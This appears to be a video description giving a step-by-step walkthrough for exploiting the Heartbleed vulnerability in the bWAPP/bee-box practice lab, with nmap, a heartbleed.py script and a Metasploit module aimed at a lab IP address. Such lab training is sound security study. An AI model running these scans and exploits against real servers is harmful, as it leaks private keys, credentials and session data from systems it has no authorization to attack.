bWAPP Heartbleed Vulnerability

Опубликовано: 17 Апрель 2022
на канале: PseudoTime

1,542

Heartbleed Vulnerability - Low Security Level

Solution:

Step 1. On the lesson page, click on attack script - a pop up will be displayed, save the file.

Step 2. Go to the lesson page and check the Hint.
Open a new tab in your browser and login as per the given hint
https://Yourbeeboxip:8443/bWAPP/login.php
https://10.0.2.4:8443/bWAPP/login.php
Click on Advance - Accept the Risk and Continue - bWAPP page will be displayed
Use credentials bee and bug to login

Step 3. Open Command Prompt and give below command
Command: nmap --script ssl-heartbleed -sV -p 8443 10.0.2.4
Note : Change the IP to your beebox IP address
Wait patiently till the output is displayed
Check the output

Step 4. In your command prompt go to the location where you have Downloaded your file as per step 1 instructions.
Use below command:
python heartbleed.py -p 8443 yourbeeboxip
python heartbleed.py -p 8443 10.0.2.4
Check the output

Step 5. In new command prompt start msfconsole
Command - msfconsole (I have already executed this command)
Use below commands as shown in the video
search heartbleed
use 1
show options
set RHOST 10.0.2.4 (Please change IP to your Beebox ip)
set RPORT 8443
show options (To check if correct RHOST and RPORT are set)
run
Check the output
Note: If you want to see more information about the vulnerability then
(Please Follow steps as shown in the video)
use commands
set verbose true
run

PseudoTime